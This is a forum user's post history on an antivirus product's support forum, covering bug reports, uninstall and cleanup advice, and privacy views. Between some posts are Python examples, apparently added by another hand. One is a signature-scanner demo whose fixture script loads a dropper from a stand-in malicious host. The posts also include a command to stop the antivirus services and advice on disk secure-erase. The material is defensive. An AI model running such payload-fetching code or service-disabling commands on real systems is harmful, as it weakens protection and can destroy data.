Everything posted by zombunny2

  1. This is to confirm I have the same problem too. Latest version of Immunet has no option to "ask me" on detection. For me, this is a complete show-stopper for any AV/antimalware solution. I guess I'll just have to uninstall immunet until the feature is restored in a future version.
  2. I used Immunet alongside Sophos Home for maybe a year on a Windows 10 rig. It was probably the most stable and quick combination I've ever used - and that was with the ClamAV engine enabled as well! They never clashed once, even on files they could both detect. For ages I never bothered adding each to the other's exclusion list, and they played fine together. I eventually added each one's "program files" folders to the other's exclusion-list, when Sophos eventually got a false positive on one of Immunet's temporary files (I had ClamAV enabled). I think I also had to add another Sophos folder (somewhere inside "c:\programdata") to Immunet's exclusions. The combo was great and never gave me an issue once. Speed was similar to running just Windows Defender. The only way I could get quicker performance was to turn off ClamAV or switch to running just Kaspersky or F-Secure on its own.
  3. If you really need to force remove it, you could try removing it with Revo Uninstaller (gratis software) or BCUninstaller (free software, name is short for "Bulk Cr*p Uninstaller"). You will probably have the best chance of it working by attempting this from safe mode, or at least attempting to stop Immunet's services first.

    Command to stop Immunet's services:

        wmic service where "name like 'Immunet%'" call stopservice

    Procedure for entering safe mode on Windows 10: Start menu --> hold down shift and click power --> restart. From the advanced menu that appears, navigate to the troubleshooting etc. options, and buried away in there somewhere is the extremely well-hidden option to reboot in Safe Mode.

    <annoyed-rant> (I don't know what Microsoft were smoking when they came up with that one, or indeed any of the configuration dialogues in Windows 10. This task used to be accomplished by holding down F5/F8 as soon as you turned on your computer, back when Windows was simple and easy to use. The main use of safe mode is to fix a broken installation that won't boot; you now have to actually be able to boot in order to restart in safe mode!) </annoyed-rant>

    Good luck!
  4. Hiya, just to confirm the forum has just loaded correctly without warning in the latest versions of Vivaldi and Icecat.
  5. Just a little note/reminder to Immunet users: In the "Exclusions" section of Immunet's options, there are some pre-defined exclusions for a handful of common AV programs, so that you can install Immunet alongside them and it all works "out of the box" - but these still need double-checking. Unfortunately, programs occasionally change, and I can appreciate it's almost impossible to keep all of these exclusions perfectly up to date. Additionally, it would be impossible to add an exclusion for every single AV that Immunet can run alongside (e.g. there are no exclusions for Sophos, but the two can run very well together). I'd therefore suggest that everyone double-checks the exclusions for their "main" AV product. As another example, Immunet's exclusion for Kaspersky refers to a very old version. The correct exclusion should now be "%programdata%\Kaspersky Lab\AVP20.0\Data\". On one friend's install with Kaspersky as the main AV, I was getting reports of repeated crashes until I correctly excluded each AV in the other's settings. To be on the safe side, I excluded "%programdata%\Kaspersky Lab\" and "%programfiles(x86)%\Kaspersky Lab\". Don't forget to use the true path the environment variables point to for your system (e.g. %programfiles(x86)% on an English system defaults to "C:\Program Files (x86)").
  6. Has anyone else been getting a certificate error/warning when attempting to visit these forums? I've checked my computer's clock and tried visiting with GNU Icecat (Firefox ESR), regular Firefox, and Vivaldi (based on Chromium). Warning message every time. I haven't tried regular Google Chrome but suspect users of that browser won't have any issue connecting, because last time I paid any attention to anything G, Chrome still wasn't checking the validity of HTTPS certificates (this might seem convenient because all websites "just work", but in reality is a very bad thing for your security). This situation might have changed, but as I have not used anything G for a very long time, I cannot check. If it helps webmasters with any diagnostics, I use "HTTPS everywhere" from EFF.
  7. UI Concepts

    I like your 1st and 4th designs, because they are not too flat. There's a bit of 3D in them. What I really like about all of these designs is the changes really aren't too radical, and in all of these mockups, the program is instantly recognisable as Immunet. I don't mind designs 2 and 3, but personally I think they're a little too flat and so-called "modern UI" for my taste, and I also worry that the textured background will eventually start to look dated. I'd still welcome any of your designs though!
  8. I wholeheartedly agree. The standard Immunet UI actually looks pretty good and has aged rather well. It's also very easy to understand and use, right from the moment you first ever use the program. The only real area where it starts to show its age is on high resolution screens, where it either appears very small or scales poorly. It was better suited to the days of 800x600 or 1024x768. Maybe all it needs is a very slight cosmetic revamp, and the addition of scaling/HiDPI capability, with the general layout left largely untouched. Like others here, I really don't like the trend for "modern" UI. It's flat, boring, looks dated to begin with, and has no visual appeal whatsoever. It's like the whole metaphor of a "button" that you "press" has gone out of the window, and designers got lazy and just drew harsh-edged rectangles in Paintbrush. I remember DosShell and the MS Windows 1.x-2.x series being more ornate than W10. Even the standard X11 TWM is, and that's older than me! I still think the prettiest and nicest looking user interface for desktop PCs was KDE3 with the Keramik widgets and window-decorations, and Crystal icon theme. That was extremely 3D! The nearest Windows equivalent would probably be Windows XP Luna. Both still look good today even in a VM on modern hardware - although I think the best looking Windows interface by far (and easiest to use) is the 9x/ME/NT/2000 interface. Again, those buttons etc. still look good for some programs, even at high res.
  9. If your machine uses BIOS ("legacy boot"), use something like Emsisoft Emergency Kit, Kaspersky rescue disk, etc. to clean your machine. That should fix any MBR virus. If the BIOS itself has been compromised, you could try reflashing the BIOS from the manufacturer's web site, but really you just can't trust that hardware any more. By the looks of things, it uses EFI though. If the hardware itself (chips) has somehow been compromised, the same applies as above - reflash or junk. However - if just the EFI boot partition has been infected, again EEK or a rescue disk should fix it. You need to have not booted from that hard disk to be able to fix it. If it still can't be cleaned, just issue an ATA secure erase command (search the net for how to do it) to reset your hard disk to factory settings (or just buy a new hard disk). Then reinstall your OS and restore your files from backups.

    Be warned:
    1. ATA secure-erase wipes absolutely everything from your hard drive. It will all be gone forever (including whatever virus is lurking on it). Don't do it without verifying you have already safely saved everything you needed elsewhere. Once your porn collection and cat-videos are gone, they're gone.
    2. If your backups are also compromised, then restoring them will re-infect your machine and you'll be back where you started, just several hours older. This obviously also applies to cloud storage, not just USB sticks and hard drives.
    3. If it's not offline and not disconnected, it's not a backup. "The cloud" isn't a backup. Even if it's called "cloud backup". An extra hard-disk partition isn't a backup. Two tapes or hard-disks in a safe, used in rotation, is a backup.
  10. Hope you got it sorted. +1 for Emsisoft Emergency Kit. I wouldn't be without it. It's my go-to cleanup tool and normally one pass with that leaves nothing left for any other tools to clean up. I believe you can also make a bootable CD/DVD/USB clean-up tool from within any Kaspersky product (including home free). They might even provide an ISO on their web site, I don't remember. Once the machine boots up, F-Secure online scanner is also pretty good and very fast. Finally, honourable mention to MalwareBytes - both MBAM and AdwCleaner. These days, I find their detection rate is nowhere near what it used to be, but it's still worth giving it a go. --- If you're still having trouble, Zemana is very fast but I've never ever seen it detect anything - even when I once tested it on a malware collection I've accumulated. I scanned the entire folder and... precisely zero detections. That said, it probably looks for the indicators of compromise on the actual system, rather than the droppers in a folder. Another issue with it is that after uninstall, it leaves lots of traces on your system that are extremely difficult to remove - DLLs to unregister, files to take ownership of, and the like. If you're getting really desperate, and are familiar with *nix, get any Linux live CD and install clamav into the live session. Then, take your pick of the unofficial databases. I'd suggest any of the low-risk Sane-Security databases, and all the SecuriteInfo databases, and copy those into /var/lib/clamav. Then scan your system with that. Be warned, there will be a few false positives... If you don't already know how to do this and what to do with clamav's output, I'd say it'd be easier to just wipe your machine and start over by this point, but it's worth a shot if you've used ClamAV from within GNU/Linux before, and you've exhausted every other option.
  11. I think I made a suggestion recently on these forums to provide an option for this in some future version of Immunet. The best solution, would be to copy what MalwareBytes do: They have an option in the settings, "Register with Windows Security Center". That way, someone using it as their only protection can set "yes", and someone wanting to use it as a companion to Windows Defender can set "no". When MBAM is not registered with the Security Center, Windows Defender stays on. At the moment, Immunet does not provide this option, so unless you start delving into registry and other settings, it will always turn Windows Defender off.
  12. I don't know if this will help much, but Sophos Home (free version) plays really nicely with Immunet, and I never saw this behaviour in that scenario. Therefore it could be either MBAM or one of the additional components present in Sophos Advanced Endpoint Protection that causes this. I'd guess it'll be one of the behaviour-monitoring or anti-ransomware components. When I ran Sophos Home Free with Immunet, they worked fine straight out of the box, and didn't even fight to clean detections (like the eicar file) - however, to be on the safe side, I excluded each program's "program files" and "program data" (if I could locate it), later on anyway. It may be the case that you need to exclude Sophos's folders in Immunet, and Immunet's folders in Sophos. If Sophos has an option to exclude processes, you could even exclude Immunet's services and GUI from Sophos. Obviously, repeat for MBAM and Immunet too.
  13. Just a quick note: Once or twice (but very rarely) I've had Immunet quarantine a file, and upon attempting to restore it, Immunet has simply responded with "Restore failed" - and the file is seemingly gone forever. I think sometimes Immunet's history database gets corrupted. I've not worked out whether this is some sort of failed quarantine, or whether the history files get a bit corrupted at some point afterwards, preventing restoration. Like I say, it's very rare. I think it's only ever happened to me twice, and that's all the time since the pre-ClamAV cloud-only version (pre version 2.0), so it'd be difficult to replicate. I think correct behaviour when "ask me" is selected in the GUI should be to block access to the file (to keep the system safe) and immediately open a dialogue box ("quarantine the file?", yes/no). The file should only be moved to quarantine after the user has clicked "yes". The current method is automatic quarantine, which necessitates restoration of false positives, which leads to data loss when an error occurs.
  14. Responding a bit more to your post... I haven't mentioned mobile phone surveillance, but basically if it really worries you, take a look at the Replicant, /e/, and LineageOS ROMs for your phone, and consider ditching the Google Play store and its proprietary apps for the F-Droid store and its free (libre) open-source apps. Or use a non-smart phone. I occasionally have a digital detox with a vintage Nokia. I really don't miss out on anything. You might also want to consider whether all those loyalty cards (and the data-profiling they entail) are really worth it (unless you're on the poverty line, they're probably not). You might also want to educate yourself (if you haven't already) on when (and when NOT) to use a VPN and/or TOR. You can get some great information by checking out EFF's surveillance self-defense site, privacytools.io, restoreprivacy.com, thatoneprivacysite.net and any other reputable sites dealing with this subject (clue: they won't be sponsored by any of the services they recommend, and they'll be transparent about how they operate). You may also find it useful to change your e-mail and search providers away from the main big ones. Be warned that looking into privacy is like falling down a rabbit-hole, and it's really easy to get very, very paranoid and overestimate your threat model. You can easily cut yourself off from the world, make your computer unusable and bogged-down, etc. I prefer a middle ground, therefore I go for an option of passive resistance: I want advertisers, data-trackers and governments to know that I object to what they do, even though it would be impractical for me to attempt to stop them. I can't stop them, but I can make it a little more difficult and expensive for them, and I can reduce what they get hold of. I don't have much to hide and am not doing anything illegal, but privacy is a basic human right, and I reserve that right even when I don't need to make use of it.

    By upholding that right, I potentially save the life of someone who does need to make use of that right, such as a whistleblower, human-rights lawyer or journalist. To paraphrase Edward Snowden: "The nothing to hide, nothing to fear argument is like saying nobody should have freedom of speech just because you have nothing to say".
  15. Interesting mention of Sophos. The same concern crossed my mind once, when deciding which AV to use, however I don't think you need to worry! I initially thought Sophos would send data back to GCHQ, however I really doubt it for one big reason: There's absolutely no need to waste the time and effort doing it. The UK already has an intelligence deal with the Americans, which means that there's no need to pressure Sophos to put a backdoor in their software: The NSA probably already has one in the Operating System, which makes compromising the AV a redundant effort. Any data collected by one 5-eyes country is available to the others. For the same reason, I have no problem trusting Immunet (an American AV, owned by Cisco), because it's already running on an American OS (Windows). If the NSA wants to spy on us, they won't ask Sophos, Immunet and others to backdoor their products, when the operating system itself with all its telemetry is already a tool of mass surveillance. All they have to do is issue a court order telling Microsoft to turn over the information they already collect! Alternatively, they could just ask Microsoft to put a backdoor in the operating system. One point of contact and collection for everyone is far more efficient than going via every single AV vendor and relying on your target using one of the AVs you managed to compromise. As a side note, depending on your views about China and Russia you'd still have this theoretical worry with a Chinese or Russian AV, because obviously they're not in the Western spy-club (5/9/14-eyes). They'd therefore have to compromise something like an AV because they wouldn't be able to pressure Microsoft to backdoor the OS or turn over data like that. Of course, depending on your nationality, views and threat-model, you might not be concerned about this - or you might even trust the Chinese and Russians more than the 5/9/14-eye nations of the West. This is of course all speculation.

    In any given situation, we don't know for sure who is targeted for surveillance, who is doing the surveillance, and which firms and service-providers are implicated in it. My point is that GCHQ has no need to compromise Sophos (or any other AV) because it would be a far better use of resources for the NSA to compromise Microsoft. If you can't trust your operating system, worrying about the software running on it is irrelevant and pointless. This is actually one of the many reasons why I tend to favour GNU/Linux, *BSD et al. wherever possible. I admit they're not perfect and not invulnerable, but that's all a discussion for another thread and another day.
  16. Exploits using public charging points have been around for a while. I have always avoided these even since before the first proof-of-concept exploits were published, for two reasons: Firstly, because it was inevitable this would happen, and secondly, because you cannot guarantee the stability and reliability of the power supply at an unknown charging point. If I use the charger that came with my device, plugged into a surge protector, I know it won't damage my device. I would recommend anyone that ever uses these charging points to purchase a USB data-blocker (also often called a "USB condom"), or to use a charging-only cable. A data-blocker is very small (only about the size of your USB plug). It plugs into the USB charging point, and you plug your cable into the data-blocker. It does the same thing as a charging-only cable: It leaves the voltage connections intact but severs the data connections on the plug - so your device can still charge, but it is completely impossible to exchange data via USB. They all seem fairly inexpensive. Mine is a "Portapow" one, which seems to be the most common; however many other manufacturers make them including Mic-Lock (their AC-USB pays homage to AC/DC's logo) and Privise.
  17. I'm sure most Chinese firms and ordinary Chinese people in general are upstanding and honourable, however reading this article did remind me of measures I took about a year ago. I was getting ever-increasing volumes of spam to my e-mail inbox, and I got fed up with sifting through it, so I configured the e-mail server to automatically reject absolutely anything coming from a Chinese domain-name or IP-address. In short, I geo-blocked the entire state of China. I haven't had a single item of unsolicited spam since. I've not yet missed any item of mail I was expecting, either. It might be worth pointing out the obvious, though... which is that if you have Chinese friends or relatives, this would cut them off!
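The geo-blocking rule described in the post above, as an added example in Python (not the poster's configuration and not any mail server's own code). A connection is rejected when the peer address falls inside a block list or the sender domain ends in a blocked ccTLD. The network ranges and the `.cn` suffix are assumptions standing in for a real geo-IP feed; the IP ranges are RFC documentation prefixes, not any country's real allocations. IPv4-mapped IPv6 peers are unwrapped and unparseable addresses fail closed, so a dual-stack listener or a malformed value cannot slip past the filter. The caveat the post itself raises still applies: a country-wide block drops legitimate mail too, and it does nothing about spam relayed through compromised hosts elsewhere.

```python
import ipaddress

# Constructed, hypothetical block list standing in for a country-level geo-IP
# feed. These are RFC 5737 / RFC 3849 documentation ranges, NOT any country's
# real allocations; a real deployment loads the feed from a geo-IP database.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "203.0.113.0/24",
    "198.51.100.0/24",
    "2001:db8:1::/48",
)]

# Hypothetical: also reject sender domains under the blocked country's ccTLD.
BLOCKED_TLDS = ("cn",)


def _normalise_ip(raw):
    """Parse a peer address. IPv4-mapped IPv6 (::ffff:a.b.c.d), which a
    dual-stack listener reports for IPv4 clients, is unwrapped so the IPv4
    ranges still apply. Returns None for anything that is not an address."""
    try:
        addr = ipaddress.ip_address(raw.strip())
    except ValueError:
        return None
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def ip_is_blocked(raw_ip):
    addr = _normalise_ip(raw_ip)
    if addr is None:
        # A peer address the MTA cannot parse should not exist; fail closed
        # rather than let a malformed value bypass the list.
        return True
    return any(addr in net for net in BLOCKED_NETWORKS)


def domain_is_blocked(domain):
    # Case-insensitive, tolerant of a trailing dot ("example.cn.").
    labels = domain.lower().rstrip(".").split(".")
    return labels[-1] in BLOCKED_TLDS


def sender_is_blocked(peer_ip, sender_domain):
    return ip_is_blocked(peer_ip) or domain_is_blocked(sender_domain)


# Constructed sample of what a policy hook sees per inbound connection.
SAMPLE_CONNECTIONS = [
    {"id": 1, "peer": "192.0.2.10",          "mail_from": "alice@example.org"},
    {"id": 2, "peer": "203.0.113.44",        "mail_from": "promo@example.net"},
    {"id": 3, "peer": "192.0.2.11",          "mail_from": "bob@mail.example.cn"},
    {"id": 4, "peer": "::ffff:198.51.100.9", "mail_from": "carol@example.org"},
    {"id": 5, "peer": "2001:db8:1::beef",    "mail_from": "dave@example.com"},
    {"id": 6, "peer": "2001:db8:2::1",       "mail_from": "erin@example.com"},
]


def filter_connections(connections):
    """Split connections into (accepted_ids, rejected_ids)."""
    accepted, rejected = [], []
    for conn in connections:
        domain = conn["mail_from"].rsplit("@", 1)[-1]
        bucket = rejected if sender_is_blocked(conn["peer"], domain) else accepted
        bucket.append(conn["id"])
    return accepted, rejected


if __name__ == "__main__":
    ok, dropped = filter_connections(SAMPLE_CONNECTIONS)
    print("accepted:", ok)       # [1, 6]
    print("rejected:", dropped)  # [2, 3, 4, 5]
```

In a real MTA this logic sits in a policy hook or milter, which sees the peer address and `MAIL FROM` before the message body is accepted, so rejected senders cost almost nothing.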
  18. I don't see this option in MS Windows Defender, but maybe it was an option in MS Security Essentials on older versions of Windows. The easiest way to achieve this with minimal effort would be for Immunet to change its process priority (or whatever the Windows equivalent of 'niceness' is), and let Windows handle it. I note that this is what Antivir (now Avira) does (or used to do). It just had a simple dropdown box for "scan priority", with options "idle/low/medium/high". I just tried to see if I could do this manually via the task manager, but it doesn't seem possible, so Immunet would need to have this option added to its GUI. All I can do is change the process priority of the GUI, not the service itself...
  19. Hi all, apologies for resurrecting an older thread, but I simply haven't had the chance to reply. In the interests of courtesy and helping others with similar issues in the future, I thought I'd reply. I had already tried uninstalling (and thought I'd clicked "no" to the "remember stuff?" dialog) - however I did it again, just to be sure. I then ran the Windows built-in disk cleaner, Revo Uninstaller's "search for junk files", Bleachbit, and CCleaner, to ensure I'd removed all temporary files, orphaned registry entries, etc. I also manually searched for any immunet traces by using "dir /s/a/b/p *immunet*" from the command line, from the root directory of drive C. You can use a similar technique to search for anything cisco, sourcefire or clamav related, but in my case it didn't reveal anything Immunet-related, and risks identifying other software. It's then just a case of using "del" and "rd" as appropriate to remove any traces of Immunet (there were virtually none). (There might be a GUI-based way of doing this, but MS generally try to hide directory-structures and system files in their GUI dialogs, so it probably won't work. It was very easy in WfW/Win9x/NT/2000, but I think something changed from XP onwards. If you want to just get something done, cmd is your friend)! Finally, a reboot and clean reinstall of Immunet and it was working fine again. I'm not sure which of these actions cleared the relevant temporary files or database-files that were causing the problem, but this sequence of steps fixed it.
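The `dir /s/a/b/p *immunet*` search and the `del`/`rd` cleanup in the post above, as an added Python example (not the poster's commands and not Immunet's own uninstaller). It walks a constructed directory tree standing in for drive C, matches names case-insensitively the way `dir` does, reports a matched folder once without listing its contents, and refuses to delete anything that resolves outside the root, so a junction or symlink left behind by an uninstaller cannot turn the cleanup into deleting something else. The sample layout and file names are constructed for the demo.

```python
import os
import shutil
import tempfile


def find_traces(root, needles=("immunet",)):
    """Case-insensitive equivalent of `dir /s /a /b *needle*` run from root.
    Returns relative paths (forward slashes) of every file or directory whose
    own name contains any needle. A matched directory is reported once and not
    descended into, since removing it removes everything underneath."""
    needles = tuple(n.lower() for n in needles)
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        keep = []
        for d in dirnames:
            if any(n in d.lower() for n in needles):
                hits.append(_rel(rel, d))
            else:
                keep.append(d)
        dirnames[:] = keep  # prune in place so os.walk skips matched dirs
        for f in filenames:
            if any(n in f.lower() for n in needles):
                hits.append(_rel(rel, f))
    return sorted(hits)


def _rel(rel_dir, name):
    return os.path.normpath(os.path.join(rel_dir, name)).replace(os.sep, "/")


def remove_traces(root, rel_paths, dry_run=True):
    """Equivalent of `del` / `rd /s /q` for each hit. Every target is resolved
    first and must stay under root. A symlink hit is unlinked itself, never
    followed. Returns what was (in dry-run mode: would be) removed."""
    root_real = os.path.realpath(root)
    removed = []
    for rel in rel_paths:
        target = os.path.join(root, *rel.split("/"))
        resolved = os.path.realpath(target)
        if os.path.commonpath([root_real, resolved]) != root_real:
            raise ValueError(f"refusing to remove {target}: resolves outside {root}")
        if not dry_run:
            if os.path.isdir(target) and not os.path.islink(target):
                shutil.rmtree(target)
            else:
                os.remove(target)
        removed.append(rel)
    return removed


# Constructed stand-in for a system drive after an incomplete uninstall.
SAMPLE_LAYOUT = {
    "Program Files/Immunet/bin": ["iptray.exe"],
    "ProgramData/Immunet/history": ["history.db"],
    "ProgramData/Sophos/Config": ["settings.xml"],
    "Users/me/AppData/Local/Temp": ["immunet_install.log", "other.tmp"],
    "Windows/System32": ["kernel32.dll"],
}


def build_sample_tree(base, layout=SAMPLE_LAYOUT):
    for d, files in layout.items():
        path = os.path.join(base, *d.split("/"))
        os.makedirs(path, exist_ok=True)
        for f in files:
            open(os.path.join(path, f), "w").close()


def demo():
    """Search, then clean, the sample tree in a temp dir. Returns
    (hits_before, hits_after, unrelated_file_survived)."""
    base = tempfile.mkdtemp(prefix="trace-demo-")
    try:
        build_sample_tree(base)
        before = find_traces(base)
        remove_traces(base, before, dry_run=False)
        after = find_traces(base)
        survived = os.path.isfile(os.path.join(base, "ProgramData", "Sophos", "Config", "settings.xml"))
        return before, after, survived
    finally:
        shutil.rmtree(base, ignore_errors=True)


def escape_is_refused():
    """The guard in action: a symlink named like a trace but pointing outside
    root must raise, and the outside directory must still exist afterwards."""
    base = tempfile.mkdtemp(prefix="trace-escape-")
    outside = tempfile.mkdtemp(prefix="trace-outside-")
    try:
        os.symlink(outside, os.path.join(base, "Immunet-leftover"))
        try:
            remove_traces(base, find_traces(base), dry_run=False)
        except ValueError:
            return os.path.isdir(outside)
        return False
    finally:
        shutil.rmtree(base, ignore_errors=True)
        shutil.rmtree(outside, ignore_errors=True)


if __name__ == "__main__":
    before, after, survived = demo()
    print("found:", before)
    print("left :", after, "| unrelated file intact:", survived)
```

Run `find_traces` with `dry_run=True` first and read the list: as the post notes, a broad needle such as "cisco" or "clamav" will also match other software, and that is exactly what the dry run is for.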
  20. I have just noticed another thing: The settings are forgotten if you run a scan.

    Steps to reproduce:
    1. Change and apply settings.
    2. Run a flash scan.
    3. Return to settings dialog.

    Expected behaviour: my settings persist.
    Actual behaviour: my settings forgotten; settings returned to default.

    Just to confirm, everything is online (I can scan etc.) and no error messages are appearing.
  21. I've tried a fresh install of Immunet twice now, with the same behaviour. The version I currently have installed is
    Machine is Windows 10 Pro x64. If I open the settings dialog, change the settings from default (for instance, ask on detection / blocking mode / scan inside archives / scan packed), and hit apply, the settings are not remembered after reboot (or after quitting and restarting the Immunet tray icon, or restarting the Immunet service).

    Expected behaviour: My settings persist until I change them.
    Actual behaviour: Default settings return after restarting PC or Immunet tray client or Immunet service.

    Steps to reproduce:
    1. Change and apply settings in the settings dialog.
    2. Restart either IPtray, Immunet service(s), or PC.
    3. Return to settings dialog and check settings.
  22. Immunet is intended to be a companion AV, much like MalwareBytes is intended to be a companion antimalware. However, there is a slight problem that prevents this happening if you use Windows Defender as your main AV in Windows 10. That problem is Immunet's security-centre integration. In versions of Windows prior to 10, the security centre detected installed antimalware software, but did not automatically disable Microsoft Security Essentials/Defender when present. This caused problems with multiple installed AV programs running simultaneously. A user who installed a 3rd party AV had to manually disable/uninstall Microsoft's AV. As a result, Windows 10 now automatically disables Windows Defender if it detects a third party antimalware solution is installed. For the vast majority of cases, this is desirable to preserve system stability. For companion AV software such as Immunet, this is an annoyance. When you install Immunet, it integrates itself automatically in the Windows 10 security centre. This disables Windows Defender. This is undesirable, as Immunet is a companion AV, and if run alone, it has a lower detection rate, so the net result is a level of protection that is lower than the level provided by Windows Defender! In previous versions of Windows, it was possible to achieve great protection by running Windows Defender in parallel with Immunet. In Windows 10, one would need to install another 3rd party antivirus solution in order to run Immunet as a companion AV. In this case, Windows security centre warns the user that they should not be running two antivirus solutions in parallel! The way MalwareBytes solves this problem is to have an option for "security centre integration" in their settings dialog. That way, if the user wants to use MalwareBytes as the sole protection on the computer, they can enable the option. If they want to run it as a companion program, they can disable the option.

    So my suggestion is to add "security centre integration" to the list of toggle switches in Immunet's settings dialog.
  23. @Deathinition as I scrolled down this thread I knew you were using either Chromium or a Chromium-based browser. Are you, by any chance, also using either UBlock Origin or Nano Adblocker in it? I repeatedly get this detection from my Immunet install. The filename of the detection is always "f_" followed by a hexadecimal number, and it is always in my Vivaldi (another Chromium-based browser) cache folder. In my case, it is a false positive on one of the blocklists used by UBlock Origin. Some of ClamAV and Immunet's signatures trigger on certain malicious web links in text files. UBlock's blocklists are text files filled with, amongst other things, fragments of malicious links (after all, UBlock needs to know what to block). Immunet, unfortunately, can't distinguish between "my evil malware site dot com" as a place to go, contained within an evil script, and "my evil malware site dot com" as a place *not* to go, contained within a blocklist! It just sees the link and has to take the cautious approach. I get this same detection if I do a manual scan of my /home directory with ClamAV on GNU/Linux (the OS where I spend >99% of my time). In Vivaldi, there's also a built-in feature that blocks certain really aggressive malvertising features. Most browsers also use the Google safe-browsing database as well. Both of these features of course contain lists of web sites for the browser to avoid - and as a result, both of these features have also triggered this detection in my copy of Immunet before now. But most of the time (almost every time I get this detection), it's UBlock Origin updating its filter lists. I can even repeatedly trigger the exact same detection by manually forcing UBo to update its blocklists.
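The false-positive mechanism described in the post above, as an added Python example (not ClamAV's or Immunet's signature engine, whose signature formats are richer than a plain substring). A constructed two-entry signature set is matched against a constructed dropper script and a constructed Adblock-syntax filter list naming the same hosts; both trigger, exactly as the post says. The second function is a triage step for the quarantined cache file: if most of its non-comment lines parse as filter rules, the detection is probably a blocklist rather than a payload. That argues for a false positive; it does not prove one. The signature names, hosts and samples are all hypothetical.

```python
import re

# Constructed signature set: plain-text fragments of hostile URLs, the kind of
# thing a text-file signature carries. Names and hosts are hypothetical.
SIGNATURES = {
    "Html.Malware.Example-1": "my-evil-malware-site.example/dropper.js",
    "Html.Malware.Example-2": "phish-login.example/verify",
}

# Constructed sample 1: a script that really does fetch the payload.
EVIL_SCRIPT = """\
var s = document.createElement('script');
s.src = 'http://my-evil-malware-site.example/dropper.js';
document.head.appendChild(s);
"""

# Constructed sample 2: an Adblock-syntax filter list naming the same hosts so
# that the browser avoids them.
FILTER_LIST = """\
[Adblock Plus 2.0]
! Title: Example blocklist (constructed)
! Expires: 1 day
||my-evil-malware-site.example/dropper.js
||phish-login.example/verify$document
example.org##.sponsored-banner
"""


def scan(text):
    """Naive content scan: every signature whose fragment occurs anywhere in
    the text fires, with no idea whether the text fetches or blocks the host."""
    return sorted(name for name, frag in SIGNATURES.items() if frag in text)


ABP_HEADER = re.compile(r"^\[Adblock(?: Plus)?[^\]]*\]$")
# One line of Adblock filter syntax: ||host rules, @@ exceptions, cosmetic
# host##selector / host#@#selector rules, or a bare host optionally ending in
# ^, $options or a path.
ABP_RULE = re.compile(r"^(\|\||@@|[\w.*-]+(##|#@#|\^|\$|/|$))")


def looks_like_filter_list(text, threshold=0.8):
    """True when at least `threshold` of the non-comment lines parse as filter
    rules. Comment lines start with '!'; the optional [Adblock ...] header is skipped."""
    lines = [ln.strip() for ln in text.splitlines()]
    body = [ln for ln in lines
            if ln and not ln.startswith("!") and not ABP_HEADER.match(ln)]
    if not body:
        return False
    rules = sum(1 for ln in body if ABP_RULE.match(ln))
    return rules / len(body) >= threshold


def triage(text):
    """What fired, and whether the flagged file reads as a blocklist."""
    hits = scan(text)
    is_list = looks_like_filter_list(text)
    if hits and is_list:
        verdict = "likely false positive: filter list"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"detections": hits, "filter_list": is_list, "verdict": verdict}


if __name__ == "__main__":
    for label, sample in (("script", EVIL_SCRIPT), ("blocklist", FILTER_LIST)):
        print(label, triage(sample))
```

Point the triage at the quarantined `f_...` cache file before deciding anything: when it is a filter list there is nothing to restore, because, as the post notes, the extension fetches the list again on its next update.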
  24. I had a quick look at task manager on my Windows PC a bit earlier. Immunet was using about 40-80MB - but it gradually rose to about 350MB while I was observing it. The PC was seemingly idle. However I looked at the "Windows update" dialogue, and it was performing an update in the background, so I think the memory spike was due to Immunet's realtime guard scanning lots of files. The above was measured with blocking mode on and all scanning engines enabled. I suspect that if you disable ClamAV and rely solely on the cloud engines (Ethos and Spero), your memory and CPU usage will decrease significantly - probably down to the tens of megabytes range. I rely on the ClamAV engine as I have an extensive set of custom signatures, so I leave it enabled. If you are always online, then the cloud engines alone will probably provide you adequate protection.
  25. I remember in earlier versions of Immunet, possibly circa 2.0 or 3.0, there was a bug that caused excessive hard disk usage. If I remember right, I think it was related to Immunet's internal logging (scan-result cache). If something caused the realtime guard to scan lots of files, or if the user initiated a system scan, Immunet would thrash the hard disk mercilessly and bring the whole computer to a crawl. Of course, people with SSDs didn't really notice (unless their SSD wore out). Perhaps some sort of regression has been introduced in version 7.0 that affects certain systems? I can confirm it's not happening on a Windows 10 pro machine with a Core i7 8700k. Is Immunet the sole AV, or a companion-AV? Perhaps the workstation's main AV and Immunet are both fighting for access to something, or scanning each other's temporary files, and detecting each other's file-accesses (causing some sort of scanning loop)? This is the only situation where I've noticed this happen in recent years.